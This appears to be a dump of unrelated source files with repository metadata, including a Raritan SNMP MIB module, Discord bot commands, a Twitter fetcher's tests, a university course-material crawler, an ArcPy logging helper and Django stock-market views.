compositeAssetStripCompositionChanged = NotificationType((1, 3, 6, 1, 4, 1, 13742, 7, 0, 11)).setObjects(("ASSETMANAGEMENT-MIB", "deviceName"), ("SNMPv2-MIB", "sysContact"), ("SNMPv2-MIB", "sysName"), ("SNMPv2-MIB", "sysLocation"), ("ASSETMANAGEMENT-MIB", "deviceInetAddressType"), ("ASSETMANAGEMENT-MIB", "deviceInetIPAddress"), ("ASSETMANAGEMENT-MIB", "agentInetPortNumber"), ("ASSETMANAGEMENT-MIB", "assetStripNumber"), ("ASSETMANAGEMENT-MIB", "assetStripName"), ("ASSETMANAGEMENT-MIB", "oldNumberOfComponentAssetStrips"), ("ASSETMANAGEMENT-MIB", "numberOfComponentAssetStrips"))
if mibBuilder.loadTexts: compositeAssetStripCompositionChanged.setStatus('current')
if mibBuilder.loadTexts: compositeAssetStripCompositionChanged.setDescription('The composition of a composite asset strip changed.')
mibBuilder.exportSymbols("ASSETMANAGEMENT-MIB", bladeExtensionConnected=bladeExtensionConnected, logParentBladeID=logParentBladeID, assetManagement=assetManagement, assetStripFirmwareUpdate=assetStripFirmwareUpdate, assetStripDefaultLEDColorDisconnected=assetStripDefaultLEDColorDisconnected, deviceUserName=deviceUserName, compositeAssetStripCompositionChanged=compositeAssetStripCompositionChanged, compliances=compliances, assetStripConfigurationEntry=assetStripConfigurationEntry, logAssetStripNumber=logAssetStripNumber, rackUnitType=rackUnitType, rackUnitConfigurationChanged=rackUnitConfigurationChanged, assetStripDefaultLEDColorDisconnectedStr=assetStripDefaultLEDColorDisconnectedStr, logIndex=logIndex, assetManager=assetManager, assetStripNumberOfRackUnits=assetStripNumberOfRackUnits, assetStripName=assetStripName, defaultLEDColorDisconnectedStr=defaultLEDColorDisconnectedStr, AssetStripFirmwareUpdateStateEnumeration=AssetStripFirmwareUpdateStateEnumeration, rackUnitCount=rackUnitCount, numberOfComponentAssetStrips=numberOfComponentAssetStrips, assetTagConnected=assetTagConnected, configGroup2=configGroup2, traps=traps, LogEventTypeEnumeration=LogEventTypeEnumeration, oldestLogID=oldestLogID, logGroup=logGroup, rackUnitName=rackUnitName, ledMode=ledMode, assetManagementLogEntry=assetManagementLogEntry, trapInformationGroup=trapInformationGroup, complianceRev2=complianceRev2, currentMainTagCount=currentMainTagCount, currentBladeTagCount=currentBladeTagCount, bladeExtensionDisconnected=bladeExtensionDisconnected, logEventCount=logEventCount, conformance=conformance, maxMainTagCount=maxMainTagCount, bladeSlotID=bladeSlotID, logSize=logSize, bladeExtensionOverflow=bladeExtensionOverflow, defaultLEDColorConnectedStr=defaultLEDColorConnectedStr, raritan=raritan, assetManagementLogTable=assetManagementLogTable, ledOperationMode=ledOperationMode, assetManagementGroup=assetManagementGroup, AssetManagementLEDModeEnumeration=AssetManagementLEDModeEnumeration, RackUnitNumberingModeEnumeration=RackUnitNumberingModeEnumeration, bladeSlotPosition=bladeSlotPosition, configuration=configuration, assetStripStateChange=assetStripStateChange, defaultLEDColorConnected=defaultLEDColorConnected, assetStripID=assetStripID, assetStripType=assetStripType, tagFamily=tagFamily, logRackUnitNumber=logRackUnitNumber, deviceInetIPAddress=deviceInetIPAddress, rackUnitNumberingOffset=rackUnitNumberingOffset, assetStripConfigurationTable=assetStripConfigurationTable, assetStripState=assetStripState, assetManagementTable=assetManagementTable, assetTagDisconnected=assetTagDisconnected, configGroup=configGroup, assetStrip=assetStrip, slotNumber=slotNumber, log=log, assetStripDefaultLEDColorConnectedStr=assetStripDefaultLEDColorConnectedStr, logTimeStamp=logTimeStamp, deviceName=deviceName, logSlotNumber=logSlotNumber, RackUnitTypeEnumeration=RackUnitTypeEnumeration, trapsGroup=trapsGroup, AssetStripTypeEnumeration=AssetStripTypeEnumeration, assetStripDefaultLEDColorConnected=assetStripDefaultLEDColorConnected, tagID=tagID, logAssetStripState=logAssetStripState, PYSNMP_MODULE_ID=raritan, trapInformation=trapInformation, logEventType=logEventType, bladeTagID=bladeTagID, rackUnitID=rackUnitID, deviceInetAddressType=deviceInetAddressType, bladeExtensionEntry=bladeExtensionEntry, rackUnitNumberingMode=rackUnitNumberingMode, bladeExtensionSize=bladeExtensionSize, logConfiguration=logConfiguration, bladeExtensionOverflowOccured=bladeExtensionOverflowOccured, newestLogID=newestLogID, 
deviceConfigurationChanged=deviceConfigurationChanged, rackUnitRelativePosition=rackUnitRelativePosition, assetStripCascadePosition=assetStripCascadePosition, agentInetPortNumber=agentInetPortNumber, maxBladeTagCount=maxBladeTagCount, assetStripOrientation=assetStripOrientation, logTagID=logTagID, rackUnitNumber=rackUnitNumber, RGBCOLOR=RGBCOLOR, assetStripNumber=assetStripNumber, bladeExtensionTable=bladeExtensionTable, ledColor=ledColor, oldNumberOfComponentAssetStrips=oldNumberOfComponentAssetStrips, deviceChangedParameter=deviceChangedParameter, defaultLEDColorDisconnected=defaultLEDColorDisconnected, changedParameterNewValue=changedParameterNewValue, complianceRev1=complianceRev1, logRackUnitPosition=logRackUnitPosition, AssetStripOrientationEnumeration=AssetStripOrientationEnumeration, assetStripFirmwareUpdateState=assetStripFirmwareUpdateState, groups=groups, rackUnitPosition=rackUnitPosition, AssetManagementLEDOperationModeEnumeration=AssetManagementLEDOperationModeEnumeration, assetStripCount=assetStripCount, assetManagementEntry=assetManagementEntry, DeviceConfigurationParameterEnumeration=DeviceConfigurationParameterEnumeration, ledColorStr=ledColorStr, bladeExtensionOverflowCleared=bladeExtensionOverflowCleared, AssetStripStateEnumeration=AssetStripStateEnumeration)
| 157.773537
| 5,190
| 0.784856
| 3,608
| 0.058189
| 0
| 0
| 0
| 0
| 0
| 0
| 28,995
| 0.467624
|
8be140e08c2dfb6a0ad53e343aaf11199164a255
| 487
|
py
|
Python
|
secret.py
|
yoyu777/Poll-Bot
|
db239b42c5c5e1af38a7c0a12b977c38949f0724
|
[
"MIT"
] | null | null | null |
secret.py
|
yoyu777/Poll-Bot
|
db239b42c5c5e1af38a7c0a12b977c38949f0724
|
[
"MIT"
] | null | null | null |
secret.py
|
yoyu777/Poll-Bot
|
db239b42c5c5e1af38a7c0a12b977c38949f0724
|
[
"MIT"
] | null | null | null |
# Import the Secret Manager client library.
from google.cloud import secretmanager
# Create the Secret Manager client.
secretmanager_client = secretmanager.SecretManagerServiceClient()
def get_discord_token(project_id, secret_id):
    # Fetch the latest version of the secret that stores the bot token.
    latest_secret_version = secretmanager_client.access_secret_version(
name=f'projects/{project_id}/secrets/{secret_id}/versions/latest'
)
discord_bot_token = latest_secret_version.payload.data.decode("UTF-8")
return discord_bot_token
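# Minimal usage sketch (the project and secret IDs below are placeholders, not
# taken from this repo):
#
#     TOKEN = get_discord_token("my-gcp-project", "discord-bot-token")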
| 34.785714
| 74
| 0.804928
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 145
| 0.297741
|
8be594b734f337508a46bc13ebf1d32d3f8e6f53
| 1,663
|
py
|
Python
|
Bot/extensions/moderation/ban.py
|
ChrissisCodeXD/Hikari-TestProject
|
236c8fc9081172d9edff6d629e5d11c5abe64205
|
[
"MIT"
] | null | null | null |
Bot/extensions/moderation/ban.py
|
ChrissisCodeXD/Hikari-TestProject
|
236c8fc9081172d9edff6d629e5d11c5abe64205
|
[
"MIT"
] | null | null | null |
Bot/extensions/moderation/ban.py
|
ChrissisCodeXD/Hikari-TestProject
|
236c8fc9081172d9edff6d629e5d11c5abe64205
|
[
"MIT"
] | null | null | null |
from imports import *
ban_plugin = lightbulb.Plugin("moderation.ban")
ban_plugin.add_checks(
lightbulb.checks.guild_only,
lightbulb.checks.bot_has_guild_permissions(hikari.Permissions.BAN_MEMBERS),
lightbulb.checks.has_guild_permissions(hikari.Permissions.BAN_MEMBERS),
)
@ban_plugin.command()
@lightbulb.check_exempt(utils.mod_check)
@lightbulb.option("reason", "The Reason for kicking the Member", str, required=False)
@lightbulb.option("member", "Kicks the given Member", hikari.Member, required=True)
@lightbulb.command("ban", "Kicks the given Member")
@lightbulb.implements(lightbulb.UserCommand, lightbulb.SlashCommand, lightbulb.PrefixCommand, lightbulb.MessageCommand)
async def ban(ctx: lightbulb.Context) -> None:
    if isinstance(ctx, lightbulb.context.UserContext):
        user = ctx.options.target
    elif isinstance(ctx, lightbulb.context.MessageContext):
        user = ctx.options.target.author
    else:
        user = ctx.options.member
flags = []
if ctx.interaction:
flags.append(hikari.MessageFlag.EPHEMERAL)
res = ctx.options.reason or f"'No Reason Provided.' By {ctx.author}"
await ban_member(user, ctx.get_guild(), res)
    if not flags:
        await ctx.respond(f"Banning **{user}**")
        await ctx.edit_last_response(f"Successfully banned `{user}` for `{res}`!")
    else:
        await ctx.respond(f"Successfully banned `{user}` for `{res}`!", flags=flags[0])
async def ban_member(user, guild, res):
await ban_plugin.bot.rest.ban_member(user=user, guild=guild, reason=res)
def load(bot):
bot.add_plugin(ban_plugin)
def unload(bot):
bot.remove_plugin(ban_plugin)
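# Usage sketch: lightbulb discovers this module through the load()/unload()
# hooks above, e.g. (dotted path inferred from this repo's layout, so treat it
# as a guess):
#
#     bot.load_extensions("extensions.moderation.ban")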
| 33.938776
| 119
| 0.719784
| 0
| 0
| 0
| 0
| 1,154
| 0.693927
| 865
| 0.520144
| 267
| 0.160553
|
8be59cb6314fe38c5f76d083bb061587be243807
| 2,043
|
py
|
Python
|
trend_analyze/test/test_fecth_data_from_api.py
|
popper2710/Trend_Analyze
|
0c98bcd7986bdb2d2b9bdc8022bfa08ddf0e7b0f
|
[
"MIT"
] | null | null | null |
trend_analyze/test/test_fecth_data_from_api.py
|
popper2710/Trend_Analyze
|
0c98bcd7986bdb2d2b9bdc8022bfa08ddf0e7b0f
|
[
"MIT"
] | 2
|
2020-09-26T14:58:33.000Z
|
2021-03-31T20:01:40.000Z
|
trend_analyze/test/test_fecth_data_from_api.py
|
popper2710/Trend_Analyze
|
0c98bcd7986bdb2d2b9bdc8022bfa08ddf0e7b0f
|
[
"MIT"
] | null | null | null |
import unittest
from trend_analyze.config import *
from trend_analyze.src.model import *
from trend_analyze.src.fetch_data_from_api import ApiTwitterFetcher
class TestFetchDataFromApi(unittest.TestCase):
"""
test class for fetch_data_from_api.py
"""
def __init__(self, *args, **kwargs):
super(TestFetchDataFromApi, self).__init__(*args, **kwargs)
self.atf = ApiTwitterFetcher(quiet=True)
def setUp(self) -> None:
os.environ['TREND_ANALYZE_ENV'] = 'test'
def tearDown(self) -> None:
os.environ['TREND_ANALYZE_ENV'] = TREND_ANALYZE_ENV
def test_fetch_followed_list(self):
follower = self.atf._fetch_followed_list(TEST_USERNAME)
self.assertIsInstance(follower[0], User)
def test_fetch_following_list(self):
following = self.atf._fetch_followed_list(TEST_USERNAME)
self.assertIsInstance(following[0], User)
def test_fetch_user_relations(self):
user_relations = self.atf.fetch_user_relations(TEST_USERNAME)
self.assertIsInstance(user_relations[0], UserRelation)
def test_fetch_user_info(self):
user = self.atf.fetch_user_info(TEST_USER_ID)
self.assertEqual(user.user_id, TEST_USER_ID)
def test_fetch_user_tweet(self):
user_tweet = self.atf.fetch_user_tweet(TEST_USER_ID)
for i in user_tweet:
self.assertEqual(i[0].user.user_id, TEST_USER_ID)
break
def test_fetch_tweet_including_target(self):
tweet = self.atf.fetch_tweet_including_target("TEST", is_RT=True, is_name=True)
for i in tweet:
self.assertIn("test", i[0].text.lower())
break
def test_fetch_trend_availables(self):
trend_availables = self.atf.fetch_trends_available()
self.assertEqual(trend_availables[0]['name'], "Worldwide")
def test_fetch_current_trends(self):
trends = self.atf.fetch_current_trends(JAPAN_WOEID)
self.assertNotEqual(trends[0]['trends'], [])
if __name__ == '__main__':
unittest.main()
| 32.951613
| 87
| 0.698972
| 1,833
| 0.89721
| 0
| 0
| 0
| 0
| 0
| 0
| 144
| 0.070485
|
8be760a4114acf5a4db49d05c1ef322eef5d00e1
| 1,779
|
py
|
Python
|
leetcode/easy/compare-version-numbers.py
|
rainzhop/cumulus-tank
|
09ebc7858ea53630e30606945adfea856a80faa3
|
[
"MIT"
] | null | null | null |
leetcode/easy/compare-version-numbers.py
|
rainzhop/cumulus-tank
|
09ebc7858ea53630e30606945adfea856a80faa3
|
[
"MIT"
] | null | null | null |
leetcode/easy/compare-version-numbers.py
|
rainzhop/cumulus-tank
|
09ebc7858ea53630e30606945adfea856a80faa3
|
[
"MIT"
] | null | null | null |
# https://leetcode.com/problems/compare-version-numbers/
#
# Compare two version numbers version1 and version2.
# If version1 > version2 return 1, if version1 < version2 return -1, otherwise return 0.
#
# You may assume that the version strings are non-empty and contain only digits and the . character.
# The . character does not represent a decimal point and is used to separate number sequences.
# For instance, 2.5 is not "two and a half" or "half way to version three",
# it is the fifth second-level revision of the second first-level revision.
#
# Here is an example of version numbers ordering:
# 0.1 < 1.1 < 1.2 < 13.37
#
# Credits:
# Special thanks to @ts for adding this problem and creating all test cases.
class Solution(object):
    def compareVersion(self, version1, version2):
        """
        :type version1: str
        :type version2: str
        :rtype: int
        """
        # Parse each dot-separated field into an integer; int() already
        # ignores leading zeros, so "01" and "1" compare equal.
        v1 = [int(d) for d in version1.split('.')]
        v2 = [int(d) for d in version2.split('.')]
        v1Len = len(v1)
        v2Len = len(v2)
        # Compare the shared prefix field by field.
        for i in range(min(v1Len, v2Len)):
            if v1[i] < v2[i]:
                return -1
            elif v1[i] > v2[i]:
                return 1
        # The shared prefix is equal: the longer version is greater only if
        # its extra fields contain a non-zero value (so "1.0" equals "1").
        if v1Len < v2Len:
            for d in v2[v1Len:]:
                if d != 0:
                    return -1
            return 0
        elif v1Len > v2Len:
            for d in v1[v2Len:]:
                if d != 0:
                    return 1
            return 0
        else:
            return 0
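# Quick sanity checks (illustrative; not part of the LeetCode harness):
#
#     s = Solution()
#     assert s.compareVersion("0.1", "1.1") == -1
#     assert s.compareVersion("13.37", "1.2") == 1
#     assert s.compareVersion("1.0", "1") == 0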
| 30.152542
| 100
| 0.518269
| 1,058
| 0.594716
| 0
| 0
| 0
| 0
| 0
| 0
| 817
| 0.459247
|
8be7873229c136c3351120aeb123d5e799820294
| 710
|
py
|
Python
|
utils.py
|
florenthemmi/ips-by-country
|
2f63ec2108ceaae97221de52654753c545733d84
|
[
"MIT"
] | 1
|
2021-05-24T06:16:49.000Z
|
2021-05-24T06:16:49.000Z
|
utils.py
|
florenthemmi/ips-by-country
|
2f63ec2108ceaae97221de52654753c545733d84
|
[
"MIT"
] | null | null | null |
utils.py
|
florenthemmi/ips-by-country
|
2f63ec2108ceaae97221de52654753c545733d84
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from config import CIDR_MAX_SUBNETS
class IPRange(object):
def __init__(self, data):
self.range_start = data[0]
self.range_end = data[1]
self.total_ips = int(data[2])
self.assign_date = datetime.strptime(data[3], '%d/%m/%y')
self.owner = data[4]
self.cidr = IPRange.get_cidr(self.range_start, self.total_ips)
@staticmethod
def get_cidr(range_start, total_ips):
mask = CIDR_MAX_SUBNETS.get(total_ips, None)
if not mask:
return None
return '{}/{}'.format(range_start, CIDR_MAX_SUBNETS[total_ips])
def __str__(self):
return '{}'.format(self.cidr or self.range_start)
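# Usage sketch (the row below is made-up sample data in the expected
# [range_start, range_end, total_ips, assign_date, owner] order):
#
#     r = IPRange(['2.16.4.0', '2.16.7.255', '1024', '01/01/11', 'akamai'])
#     print(r)  # the CIDR if 1024 is a key of CIDR_MAX_SUBNETS, else the range start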
| 26.296296
| 71
| 0.640845
| 640
| 0.901408
| 0
| 0
| 227
| 0.319718
| 0
| 0
| 21
| 0.029577
|
8be7899428e46960e100ad08d01429e3242a6f7d
| 4,897
|
py
|
Python
|
keats_crawler/crawl.py
|
mannmann2/keats-crawler
|
9fc108b75e63bf3dfac0c18ed2f0bec84d003c14
|
[
"MIT"
] | 8
|
2021-01-21T19:34:59.000Z
|
2022-02-14T23:09:48.000Z
|
keats_crawler/crawl.py
|
mannmann2/keats-crawler
|
9fc108b75e63bf3dfac0c18ed2f0bec84d003c14
|
[
"MIT"
] | null | null | null |
keats_crawler/crawl.py
|
mannmann2/keats-crawler
|
9fc108b75e63bf3dfac0c18ed2f0bec84d003c14
|
[
"MIT"
] | 1
|
2021-12-27T11:09:44.000Z
|
2021-12-27T11:09:44.000Z
|
"""Main module."""
from config import *
import os
import re
from threading import Thread
import requests
from urllib.parse import unquote
from bs4 import BeautifulSoup
from m3u8downloader.main import M3u8Downloader
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
VIDEO_DICT = {}
PATH = f'{PATH}{MODULE}/'
if not os.path.exists(PATH):
print('Creating directory at', PATH)
os.makedirs(PATH)
options = Options()
if HEADLESS:
options.add_argument("--headless")
driver = webdriver.Chrome(PATH_TO_CHROMEDRIVER, options=options)
def is_duplicate(href, anchor):
code = href.split('=')[-1]
file = f'{code} - {MODULE}/{anchor}\n'
    # Guard against the first run, before duplicates.txt has been created.
    if not os.path.exists('duplicates.txt'):
        return False
    with open('duplicates.txt', 'r') as f:
        files = f.readlines()
    return file in files
def remember(url, anchor):
code = url.split('=')[-1]
file = f'{code} - {MODULE}/{anchor}'
with open('duplicates.txt', 'a') as f:
f.write(file + '\n')
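# Both helpers above rely on duplicates.txt holding one entry per line in the
# form "<resource code> - <MODULE>/<anchor text>", e.g. (made-up values):
# "123456 - 7CCSMABC/Week 1 slides"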
def res_download(url, anchor):
if REMEMBER_DOWNLOADS:
remember(url, anchor)
try:
res = requests.get(url + '&redirect=1', timeout=10, cookies=COOKIE_DICT)
except requests.exceptions.Timeout:
print('timeout...')
return
name = unquote(res.url.split('/')[-1])
name = re.sub(r'[\\/:*?"<>|]', '.', name)
if anchor.endswith('URL') and not name.endswith('.pdf'):
print(f'--- {name} ... skipping')
return
with open(f'{PATH}{name}', 'wb') as f:
f.write(res.content)
print(f'--- {name} ... Done')
def parse_frame(iframe):
driver.switch_to.frame(iframe)
video_frame = driver.find_element_by_xpath("//iframe[@name='kplayer_ifp']")
driver.switch_to.frame(video_frame)
src = driver.page_source.replace('\n', ' ')
soup = BeautifulSoup(src, 'html.parser')
name = soup.find('title').text
    match = re.search(r'<video.*?</video>', src)
soup2 = BeautifulSoup(match.group(0), 'html.parser')
m3u8 = soup2.find('video')['src'].split('?')[0]
driver.switch_to.default_content()
return name, m3u8
def vid_download(name, m3u8):
name_ = re.sub(r'[\\/:*?"<>|]', '.', name)
path = f'{PATH}{name_}.mp4'
M3u8Downloader(m3u8, path).start()
print(f'--- {name} ... Done')
def run():
print('Starting...')
driver.get('https://keats.kcl.ac.uk/my')
for k, v in COOKIE_DICT.items():
driver.add_cookie({'name': k, 'value': v})
driver.get(URLS[MODULE])
soup = BeautifulSoup(driver.page_source.replace('\n', ' '), 'html.parser')
links = soup.find_all('a', class_='aalink')
if SKIP_DUPLICATES:
vid_links = [(link.text, link['href']) for link in links if '/kalvid' in link.get('href', '') and not is_duplicate(link['href'], link.text)]
res_links = [(link.text, link['href']) for link in links if '/resource' in link.get('href', '') and not is_duplicate(link['href'], link.text)]
url_links = [(link.text, link['href']) for link in links if '/mod/url' in link.get('href', '') and not is_duplicate(link['href'], link.text)]
else:
vid_links = [(link.text, link['href']) for link in links if '/kalvid' in link.get('href', '')]
res_links = [(link.text, link['href']) for link in links if '/resource' in link.get('href', '')]
url_links = [(link.text, link['href']) for link in links if '/mod/url' in link.get('href', '')]
if DOWNLOAD_RESOURCES:
        print('Downloading...', len(res_links) + len(url_links), 'resources')
threads = []
for i, (anchor, url) in enumerate(res_links + url_links):
th = Thread(target=res_download, args=(url, anchor))
th.start()
threads.append(th)
for th in threads:
th.join()
print('Done')
if DOWNLOAD_VIDEOS:
if VIDEO_LIMIT:
vid_links = vid_links[:VIDEO_LIMIT]
print('Found', len(vid_links), 'videos')
print('Extracting video links...')
ch = 'y'
for i, (anchor, url) in enumerate(vid_links):
if VIDEO_PROMPT:
ch = input(f'Download {anchor}? (y/n) ')
if ch in ['y', 'Y']:
driver.get(url)
iframe = driver.find_element_by_xpath("//iframe[@class='mwEmbedKalturaIframe'] | //iframe[@id='contentframe']")
name, m3u8 = parse_frame(iframe)
VIDEO_DICT[name] = (m3u8, url, anchor)
# threads = []
for name, (m3u8, url, anchor) in VIDEO_DICT.items():
vid_download(name, m3u8)
if REMEMBER_DOWNLOADS:
remember(url, anchor)
# th = Thread(target=vid_download, args=(name, m3u8))
# th.start()
# threads.append(th)
# for th in threads:
# th.join()
print('Done')
driver.quit()
if __name__ == '__main__':
run()
| 27.357542
| 150
| 0.588115
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,063
| 0.217072
|
8be7a3c80ff1ca3e87607f2cacd6a9420c5e831e
| 7,305
|
py
|
Python
|
logging_with_arcpy.py
|
Kortforsyningen/logging-with-arcpy
|
b227aea9c377ca6e98b2c398d294c08bce506f84
|
[
"MIT"
] | 1
|
2022-03-03T13:20:12.000Z
|
2022-03-03T13:20:12.000Z
|
logging_with_arcpy.py
|
Kortforsyningen/logging-with-arcpy
|
b227aea9c377ca6e98b2c398d294c08bce506f84
|
[
"MIT"
] | null | null | null |
logging_with_arcpy.py
|
Kortforsyningen/logging-with-arcpy
|
b227aea9c377ca6e98b2c398d294c08bce506f84
|
[
"MIT"
] | 1
|
2022-03-30T11:33:43.000Z
|
2022-03-30T11:33:43.000Z
|
# -*- coding: utf-8 -*-
"""
This module allows Python's logging module and Esri's ArcMap tools to play nicely together.
Everything here works with the root logger, there is currently no functionality to work with multiple loggers.
The standard logging.basicConfig() doesn't work out of the box in ArcMap tools, because the logging session lives
throughout the ArcMap session, and isn't restarted with every tool invocation. init_logging() can be used instead of
basicConfig(), and takes care of this issue by performing the necessary (re)initialisations.
Furthermore, flush_and_close_logger() should be called at the end of each script, to ensure that all output is flushed
when the script terminates. For the same reason mentioned above, some logging output may be delayed otherwise.
Finally, the ArcPyLogHandler class (mostly adopted from
http://gis.stackexchange.com/questions/135920/arcpy-logging-error-messages) allows the logging module to send output to
ArcMap's tool output window, using arcpy.AddMessage(), etc.
TODO:
- ArcPyLogHandler currently creates an empty file as given in input. If it isn't used, it shouldn't be created.
Created by: Hanne L. Petersen <halpe@sdfe.dk>
Created on: 2016-08-26
"""
import os
import socket
import logging
import logging.handlers
import arcpy
def init_logging(filename="log.txt", level=logging.INFO, fmt="", datefmt='%d-%m-%Y %H:%M', mode='a'):
"""
Initialise a useful logging session. For ArcMap tools, logging.basicConfig probably won't do what you want... (details below)
Use fmt="%(asctime)s %(message)s" to log without user and computer name.
If filename is a relative path, it will be relative to C:\Windows\System32 for tools called from an ArcMap toolbox.
So just use absolute paths...
Note that if you're using the logging module from inside ArcMap, e.g. from a tool in a toolbox, your logging session
will survive within the ArcMap session! In addition, the logging.basicConfig() function is intended to be run only
once ("only the first call will actually do anything: subsequent calls are effectively no-ops", from
https://docs.python.org/2/howto/logging.html#logging-advanced-tutorial)
I.e., you may have two tools that write to different log files - this won't work if you run both tools from the same
ArcMap session, and you do it the naive way.
Or if you run a tool several times inside the same ArcMap session, calling basicConfig WILL DO NOTHING. I.e.
debugging sucks big time.
In ArcMap you probably want to run flush_and_close_logger() at the end of your script, otherwise output can
sometimes be delayed.
Other format placeholders can be found in https://docs.python.org/2/library/logging.html#logrecord-attributes
TODO: The proper way for this module might be something with inheritance or subclassing...
"""
# Some useful snippets for copy-pasting when debugging:
# import logging
# root_logger = logging.getLogger()
# h = root_logger.handlers[0]
# root_logger.removeHandler(h)
# print([h.baseFilename for h in root_logger.handlers])
if fmt == '':
# Default format prepend user name and computer name.
# http://stackoverflow.com/questions/799767/getting-name-of-windows-computer-running-python-script?answertab=active#tab-top
fmt = "%(asctime)s {} {} %(message)s".format(os.getenv('USERNAME'), socket.gethostname().upper())
root_logger = logging.getLogger()
# Need to run regular basicConfig first - seems like it does something we need...
# Whatever logging level is set to a restrictive level here, it will persist throughout (looks like a bug).
# If it's set to a low level here (or NOTSET), it seems to work fine, respecting what's set later.
# The filename is replaced properly later.
logging.basicConfig(level=logging.NOTSET)
# Start by removing all existing handlers from the root logger
# Remove from the back, to avoid the indexes going haywire
for i in range(len(root_logger.handlers)-1, -1, -1):
root_logger.removeHandler(root_logger.handlers[i])
# Then set up the new handler with appropriate formatter
# https://docs.python.org/2/library/logging.handlers.html#logging.FileHandler
add_handler(logging.FileHandler(filename, mode=mode, encoding=None, delay=False), level=level)
def add_handler(h, level=logging.INFO, fmt="", datefmt='%d-%m-%Y %H:%M'):
"""Add a handler."""
root_logger = logging.getLogger()
if fmt == '':
fmt = "%(asctime)s {} {} %(message)s".format(os.getenv('USERNAME'), socket.gethostname().upper())
# Prep the Formatter, and add it
# https://docs.python.org/2/library/logging.html#logging.Formatter
f = logging.Formatter(fmt, datefmt)
# Add the level and formatter to the handler
# https://docs.python.org/2/library/logging.handlers.html#logging.FileHandler
# https://docs.python.org/2/library/logging.html#handler-objects
h.setLevel(level)
h.setFormatter(f)
root_logger.addHandler(h)
def flush_and_close_logger():
"""From ArcMap there seem to be some problems with flushing, and this seems to help..."""
for h in logging.getLogger().handlers:
h.flush()
logging.shutdown()
def _logging_is_active():
"""Check if a logging session has been initiated (e.g. with logging.basicConfig())."""
# http://stackoverflow.com/questions/26017073/how-to-get-filename-from-a-python-logger
return len(logging.getLogger().handlers) > 0
class ArcPyLogHandler(logging.handlers.RotatingFileHandler):
"""
Custom logging class that passes messages to the arcpy tool window.
From http://gis.stackexchange.com/questions/135920/arcpy-logging-error-messages
"""
# TODO: This class is still initting a RotatingFileHandler for the init filename and creating a file
# - this file should be removed (or the init re-implemented)
def emit(self, record):
"""Write the log message."""
# It shouldn't be necessary to reimport, but it seems to be, otherwise it can crash, when several tools are
# run inside the same ArcMap session...
# Perhaps the imports from the first run get cleared, but because the logging session somehow survives, they
# don't get imported again?
import logging
import arcpy
try:
my_msg = self.format(record) # fixed this - the code at stackexchange didn't work for me here
# msg = record.msg.format(record.args) # old code
        except Exception:
my_msg = record.msg
if record.levelno >= logging.ERROR:
arcpy.AddError(my_msg)
elif record.levelno >= logging.WARNING:
arcpy.AddWarning(my_msg)
else: # everything else goes here (if you don't want debug, remove it from the handler, if you do want it,
# there's nowhere else to send it to
arcpy.AddMessage(my_msg)
# The following line would send the message to the regular RotatingFileHandler, but we don't want that here:
# super(ArcPyLogHandler, self).emit(record)
# end class ArcPyLogHandler
| 46.826923
| 132
| 0.699384
| 1,640
| 0.224504
| 0
| 0
| 0
| 0
| 0
| 0
| 5,501
| 0.753046
|
8be7ac2245946060119cdd1d1ac823a02f85034d
| 892
|
py
|
Python
|
bot.py
|
fangyi-zhou/renamer
|
ec1215f7afea1c942116a37bdd2a5fcbabee6e94
|
[
"Unlicense"
] | null | null | null |
bot.py
|
fangyi-zhou/renamer
|
ec1215f7afea1c942116a37bdd2a5fcbabee6e94
|
[
"Unlicense"
] | null | null | null |
bot.py
|
fangyi-zhou/renamer
|
ec1215f7afea1c942116a37bdd2a5fcbabee6e94
|
[
"Unlicense"
] | null | null | null |
import os
import re
import discord
from dotenv import load_dotenv
load_dotenv()
TOKEN = os.getenv("DISCORD_TOKEN")
RENAME_REGEX = re.compile(r"^[Ii]'m (\w+)$")
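# Matches messages like "I'm Alice" or "i'm bob42" and captures the one-word
# name; multi-word names such as "I'm Mary Jane" do not match, since \w+
# cannot cross the space before the end-of-string anchor.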
if TOKEN is None:
raise RuntimeError("Bot TOKEN not set")
client = discord.Client()
@client.event
async def on_ready():
print("We have logged in as {0.user}".format(client))
@client.event
async def on_message(message):
if message.author == client.user:
return
    match = RENAME_REGEX.match(message.content)
if match:
name = match[1]
try:
await client.http.change_nickname(message.guild.id, message.author.id, name)
await message.channel.send(f"Hello {name}!")
except discord.errors.Forbidden:
await message.channel.send(
f"Hello {name}! I do not have permission to change your name"
)
client.run(TOKEN)
| 21.756098
| 88
| 0.649103
| 0
| 0
| 0
| 0
| 613
| 0.68722
| 585
| 0.65583
| 159
| 0.178251
|
8be86bfbc616af693be4c8b1bf95b938750cfb4b
| 8,035
|
py
|
Python
|
market/views.py
|
morphosis-nitmz/Stock-Bridge-2018
|
5f7d55a5dfeed52e2fa46fd1e2abd6bba80c954a
|
[
"MIT"
] | 12
|
2019-09-10T02:51:01.000Z
|
2022-03-23T07:19:34.000Z
|
market/views.py
|
morphosis-nitmz/Stock-Bridge-2018
|
5f7d55a5dfeed52e2fa46fd1e2abd6bba80c954a
|
[
"MIT"
] | null | null | null |
market/views.py
|
morphosis-nitmz/Stock-Bridge-2018
|
5f7d55a5dfeed52e2fa46fd1e2abd6bba80c954a
|
[
"MIT"
] | 8
|
2019-06-26T14:16:23.000Z
|
2022-01-07T08:48:08.000Z
|
from datetime import datetime
from decimal import Decimal
from django.conf import settings
from django.contrib.auth import get_user_model
from django.shortcuts import render, redirect
from django.http import HttpResponseRedirect, HttpResponse
from django.views.generic import View, ListView
from django.urls import reverse
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.utils import timezone
from django.utils.timezone import localtime
from rest_framework.views import APIView
from rest_framework.response import Response
from .models import Company, CompanyCMPRecord, InvestmentRecord, Transaction
from .forms import StockTransactionForm, CompanyChangeForm
from stock_bridge.mixins import LoginRequiredMixin, CountNewsMixin, AdminRequiredMixin
User = get_user_model()
START_TIME = timezone.make_aware(getattr(settings, 'START_TIME'))
STOP_TIME = timezone.make_aware(getattr(settings, 'STOP_TIME'))
@login_required
def deduct_tax(request):
""" Deduct income tax """
if request.user.is_superuser:
for user in User.objects.all():
            tax = user.cash * Decimal('0.4')
user.cash -= tax
user.save()
return HttpResponse('success')
return redirect('/')
@login_required
def update_market(request):
""" Update company's cmp after applying formula """
if request.user.is_superuser:
# update company cmp data
company_qs = Company.objects.all()
for company in company_qs:
company.update_cmp()
obj = CompanyCMPRecord.objects.create(company=company, cmp=company.cmp)
return HttpResponse('cmp updated')
return redirect('/')
